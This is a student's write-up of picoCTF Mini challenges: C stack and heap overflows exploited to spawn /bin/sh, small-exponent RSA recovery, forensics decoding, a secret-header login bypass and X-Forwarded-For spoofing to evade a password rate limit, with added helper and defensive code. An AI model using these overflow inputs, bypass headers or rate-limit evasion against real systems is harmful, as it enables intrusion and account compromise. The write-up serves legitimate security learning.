picoCTF Mini by CMU-Africa Writeup

picoCTF Mini by CMU-Africa

I am taking the Computer Security course this semester, which requires me to participate in a public CTF. Among the public CTFs, I chose PicoCTF because it is one of the most beginner-friendly. Its problems are much easier than the course homework, so I could solve them in a short time. The problems are also varied: besides the kinds of problems I solved in the course, there are some unusual ones that require checking the metadata of a file.

Writeup

Input Injection 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void fun(char *name, char *cmd) {
    char c[10];            /* the command that is handed to system() */
    char buffer[10];       /* the name; the exploit relies on c sitting right after it on the stack */

    strcpy(c, cmd);        /* neither copy checks the length: an overly long name */
    strcpy(buffer, name);  /* overflows buffer and overwrites c */

    printf("Goodbye, %s!\n", buffer);
    fflush(stdout);
    system(c);
}

fun passes c to system(), and both strcpy calls are unbounded, so a name longer than 10 bytes overflows buffer into c, which sits right after it on the stack. We can therefore use the overflow to write our own command (/bin/sh) into c.

  1. nc saffron-estate.picoctf.net <port>
  2. Input aaaaaaaaaa/bin/sh
  3. cat flag.txt

Input Injection 2

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    char* username = malloc(28);
    char* shell = malloc(28);   /* two adjacent heap chunks; the program prints where they are */

    printf("username at %p\n", username);
    fflush(stdout);
    printf("shell at %p\n", shell);
    fflush(stdout);

    strcpy(shell, "/bin/pwd");

    printf("Enter username: ");
    fflush(stdout);
    scanf("%s", username);      /* no width limit: a long name runs past the 28-byte chunk into shell */

    printf("Hello, %s. Your shell is %s.\n", username, shell);
    system(shell);
    fflush(stdout);

    return 0;
}

This is also a buffer overflow, this time on the heap: scanf("%s") reads the username without any length limit. Our goal is to overflow username and write /bin/sh into shell. From the addresses the program prints, we know shell is at username+48, so we can get the flag like this:

  1. nc saffron-estate.picoctf.net <port>
  2. Input a*48 + "/bin/sh"
  3. cat flag.txt

Crack the Power

In message.txt we see n, e and c, and speculate that the flag is encrypted to c by RSA. Observe that e is only 20 and c is much smaller than n, so it is likely that m^e never wrapped around the modulus, i.e. m^e = c < n.

Therefore we search for m (the flag) one decimal digit at a time, from the most significant digit down, until m^20 = c.

c = 640637430810406857500566702096274084170639990940796427452789530582646559503351994084630642819529512916638846054876997125498610672759860547044513026189155901787948484482403362927101626272687833687338975274586806476773521319051152565007700259664554159504729296349469197447878298780511371211790491139075259324198933821099017956702371413354628803295864874818977161515794899731393370464401493960680296137943038196051026420339668593694062087137688243381433212756006234063987908213474461679873772065186626550125172019387777864795077647708220020565875602005103342766617735797403630407673089294641211185784285212619751433812891114930402846218495033903895776530373162661788262770661056939054381211058086594610051339027542638474293177226685727990841844712534416552304889091929218453487599517664003095313175878470753143329804811225403499575412027738206715697431439846882937410842894303689755456370733764465958658500789630510555345208100742443149436428977702242274952026208528164224667869714848093393983835310607255359839284538944300791947123779789560912249158012656403415425561337179720951703957058384748262011159099547304088342818511440896654498113757280563601

# m**20 == c, so m has about len(str(c)) / 20 decimal digits; start one digit above that
x = 0
e = 20
power = len(str(c)) // e + 1
step = 10 ** power

# Fix one decimal digit of m per pass, from the most significant digit down:
# find the largest multiple of `step` whose e-th power is still <= c, then refine.
while step > 0:
    print(f"{power = }")
    while x ** e <= c:
        x += step
    x -= step
    step //= 10
    power -= 1

assert x ** e == c   # the root is exact, so no modular reduction happened

# the flag is m interpreted as a big-endian byte string (no leading zero bytes)
print(x.to_bytes((x.bit_length() + 7) // 8, "big").decode())
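As an added example (not code from the writeup), the digit-by-digit search above generalises to an exact integer e-th root by binary search for any small exponent, and to the case where m^e wrapped around n a few times (m^e = c + k·n for a small k). The sample values at the bottom are constructed placeholders, not the challenge's real parameters.

```python
# Added example, not part of the writeup: an exact integer e-th root by binary
# search, generalising the digit-by-digit search to any small exponent e, plus the
# case where m**e wrapped around n a few times (m**e = c + k*n for a small k).

def iroot(c: int, e: int):
    """Return m with m**e == c, or None if c is not a perfect e-th power."""
    if c < 0 or e <= 0:
        raise ValueError("need c >= 0 and e >= 1")
    if c < 2:
        return c
    # hi is a power of two strictly above the root: c < 2**bits, so root < 2**ceil(bits/e)
    lo, hi = 1, 1 << ((c.bit_length() + e - 1) // e + 1)
    while lo < hi:                       # find the smallest mid with mid**e >= c
        mid = (lo + hi) // 2
        if mid ** e < c:
            lo = mid + 1
        else:
            hi = mid
    return lo if lo ** e == c else None


def int_to_bytes(m: int) -> bytes:
    """Big-endian bytes of m without leading zero bytes."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def recover_small_e(c: int, e: int, n: int, max_k: int = 10_000):
    """Recover m from c = m**e mod n when e is small and m**e = c + k*n for some k < max_k."""
    for k in range(max_k):
        m = iroot(c + k * n, e)
        if m is not None:
            return m
    return None


# Constructed sample values (placeholders, not the challenge's real parameters):
SAMPLE_M = int.from_bytes(b"picoCTF{placeholder_flag}", "big")
SAMPLE_E = 20
SAMPLE_N = SAMPLE_M ** SAMPLE_E // 3 + 7   # chosen so that m**e wraps around n a couple of times
SAMPLE_C = pow(SAMPLE_M, SAMPLE_E, SAMPLE_N)

if __name__ == "__main__":
    m = recover_small_e(SAMPLE_C, SAMPLE_E, SAMPLE_N)
    print(int_to_bytes(m).decode())        # prints picoCTF{placeholder_flag}
```

The binary search needs about log2(root) iterations instead of ten candidates per decimal digit, and the `k` loop is the standard extension when c is not much smaller than n but e is still tiny.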

Riddle Registry

There is nothing we can learn from the content of the PDF, so we turn to its metadata.

  1. Run exiftool confidential.pdf; the Author field looks strange, like a base64-encoded string.
  2. echo cGljb0NURntwdXp6bDNkX20zdGFkYXRhX2YwdW5kIV9lZTQ1NDk1MH0= | base64 -d gives us the flag.

Corrupted File

According to the problem description, some bytes of the file are corrupted. Most likely the corrupted bytes are the magic bytes at the start of the file; otherwise it would be very hard for us to recover the file.

  1. Run xxd file, then search for the file header bytes FF E0 on Wikipedia and learn that it's a JPEG.
  2. Open the file in vim, run :%!xxd, correct the file header, then run :%!xxd -r and :wq.
  3. mv file file.jpg
  4. Open the image and get the flag.

Flag in Flame

logs.txt contains only printable characters but is not human-readable. We therefore try decoding it as base64 and find that the resulting file header indicates a JPEG.

  1. Run base64 -d -i logs.txt > logs.jpg; the image shows text that looks like a hex string.
  2. Copy the text from the image.
  3. echo <text> | xxd -r -p
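The two file-recovery steps above (Corrupted File: fix the magic bytes; Flag in Flame: peel base64 and hex layers until a real file or plain text appears) are small enough to automate. Here is an added example in Python, not code from the writeup; the magic-byte table covers a few common formats, the JFIF repair assumes only the first two bytes were damaged, and every sample input is constructed.

```python
import base64
import binascii
import string

# Added example, not from the writeup: identify a file by its magic bytes, repair a
# JFIF header whose first two bytes were corrupted (the "Corrupted File" case), and
# peel hex/base64 text layers until a known file type or plain text appears
# (the "Flag in Flame" case). All sample inputs below are constructed.

MAGICS = [
    (b"\xff\xd8\xff", "JPEG"),
    (b"\x89PNG\r\n\x1a\n", "PNG"),
    (b"GIF8", "GIF"),
    (b"%PDF-", "PDF"),
    (b"PK\x03\x04", "ZIP"),
]


def identify(data: bytes):
    """Return the file type whose magic bytes open `data`, or None."""
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return None


def repair_jfif_header(data: bytes) -> bytes:
    """Restore the JPEG SOI marker (FF D8) when the APP0 marker (FF E0) and the
    'JFIF' tag that follow it are intact; otherwise return the data unchanged."""
    if data[2:4] == b"\xff\xe0" and data[6:10] == b"JFIF":
        return b"\xff\xd8" + data[2:]
    return data


def peel(data: bytes, max_layers: int = 5):
    """Strip text encodings layer by layer. Returns (kind, payload) where kind is a
    MAGICS name, "text" for printable text, or "unknown"."""
    b64_alphabet = set(string.ascii_letters + string.digits + "+/=")
    for _ in range(max_layers):
        kind = identify(data)
        if kind is not None:
            return kind, data
        try:
            text = data.decode("ascii")
        except UnicodeDecodeError:
            return "unknown", data
        compact = "".join(text.split())          # tolerate line-wrapped input
        # Heuristic order matters: every hex string is also valid base64 text.
        if compact and len(compact) % 2 == 0 and all(ch in string.hexdigits for ch in compact):
            data = bytes.fromhex(compact)
        elif compact and len(compact) % 4 == 0 and set(compact) <= b64_alphabet:
            try:
                data = base64.b64decode(compact, validate=True)
            except binascii.Error:
                return "text", data
        elif all(ch in string.printable for ch in text):
            return "text", data
        else:
            return "unknown", data
    return "unknown", data


# Constructed sample: a minimal JFIF header plus filler, and a copy with its first
# two bytes zeroed out, as in the challenge.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\x00" * 8
CORRUPTED = b"\x00\x00" + JPEG_SAMPLE[2:]
HEX_TEXT = b"picoCTF{placeholder}".hex().encode()   # what the hex string in the image looks like

if __name__ == "__main__":
    print(identify(CORRUPTED), identify(repair_jfif_header(CORRUPTED)))   # None JPEG
    print(peel(base64.b64encode(JPEG_SAMPLE))[0])                         # JPEG
    print(peel(HEX_TEXT)[1].decode())                                     # picoCTF{placeholder}
```

`peel` stops at the first binary format it recognises, so for logs.txt it would hand back the JPEG bytes for you to open; the hex string still has to be read out of the image by hand before it can be fed back in.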

Hidden in plainsight

The image seems ordinary, so we check its metadata.

  1. exiftool img.jpg | base64 -d
  2. The output shows that the flag is hidden with steghide.
  3. First decode the password: echo cEF6endvcmQ= | base64 -d
  4. Then extract the flag: steghide extract -sf img.jpg
  5. cat flag.txt

Log Hunt

server.log looks random, but when we search for pico, we find a line containing INFO FLAGPART: picoCTF{us3_. So we can search for INFO FLAGPART to recover the whole flag.

  1. grep FLAGPART server.log
  2. Recover the flag.

Crack the Gate 1

  1. The first line of the body is a Caesar cipher: ABGR: Wnpx - grzcbenel olcnff: hfr urnqre "K-Qri-Npprff: lrf"
  2. Go to https://cryptii.com/pipes/caesar-cipher, input the ciphertext and tweak the shift until the plaintext is human-readable: NOTE: Jack - temporary bypass: use header "X-Dev-Access: yes".
  3. Use Burp Suite to send the login request with header X-Dev-Access: yes. Then we will get the flag.

Crack the Gate 2

This website blocks an IP address that keeps guessing passwords, but we can still make each request appear to come from a different IP address by setting the X-Forwarded-For header.

  1. Log in with the Burp browser.
  2. Use repeater to send the login requests with header X-Forwarded-For: <ip>. <ip> should be different for every request.
  3. Among the passwords, Xpseyq9h is correct.
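From the defender's side, the bypass above works only because the rate limiter derives the client IP from a header the client controls. The following added example in Python (not code from the challenge or the writeup) shows the weak derivation beside a hardened one that honours X-Forwarded-For only when the direct TCP peer is a known reverse proxy; the proxy subnet and the request addresses are assumed/constructed.

```python
import ipaddress
from collections import defaultdict
from typing import Optional

# Added example, not from the writeup: the defender's side of "Crack the Gate 2".
# A login rate limiter keyed on the client IP is only as good as the way that IP is
# derived. Trusting X-Forwarded-For blindly lets any client pick its own key;
# honouring it only when the direct peer is a known reverse proxy closes that gap.
# The proxy subnet and the request values below are assumed/constructed.

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]   # assumed: our reverse-proxy subnet


def _is_trusted(addr: str) -> bool:
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip_naive(remote_addr: str, xff: Optional[str]) -> str:
    """Weak: takes the first X-Forwarded-For entry, which the client controls."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_trusted(remote_addr: str, xff: Optional[str]) -> str:
    """Hardened: walk the hop list from the TCP peer backwards, skipping our own
    proxies; the first hop that is not one of them is the client. A malformed
    entry falls back to the direct peer."""
    hops = [h.strip() for h in xff.split(",")] if xff else []
    hops.append(remote_addr)                       # the TCP peer is always the last hop
    client = remote_addr
    for hop in reversed(hops):
        if not _is_trusted(hop):
            try:
                ipaddress.ip_address(hop)
                client = hop
            except ValueError:
                client = remote_addr
            break
    return client


class LoginRateLimiter:
    """Allow at most `limit` attempts per key; `key_func` derives the key from the request."""

    def __init__(self, limit: int, key_func):
        self.limit = limit
        self.key_func = key_func
        self.attempts = defaultdict(int)

    def allow(self, remote_addr: str, xff: Optional[str]) -> bool:
        key = self.key_func(remote_addr, xff)
        self.attempts[key] += 1
        return self.attempts[key] <= self.limit


def simulate(key_func, attempts: int = 5, limit: int = 3) -> int:
    """Constructed scenario: one peer (203.0.113.7, not a proxy) sends `attempts`
    login requests, each with a different X-Forwarded-For value. Returns how many
    got past the limiter."""
    limiter = LoginRateLimiter(limit, key_func)
    return sum(limiter.allow("203.0.113.7", f"198.51.100.{i}") for i in range(attempts))


if __name__ == "__main__":
    print("naive:  ", simulate(client_ip_naive))     # 5: every request got a fresh key
    print("trusted:", simulate(client_ip_trusted))   # 3: header ignored, peer IP is the key
```

The same rule applies whichever proxy sits in front of the application: derive the client address from the rightmost hop you do not operate yourself, never from the leftmost entry, and configure the proxy to overwrite rather than append any X-Forwarded-For it receives from the outside.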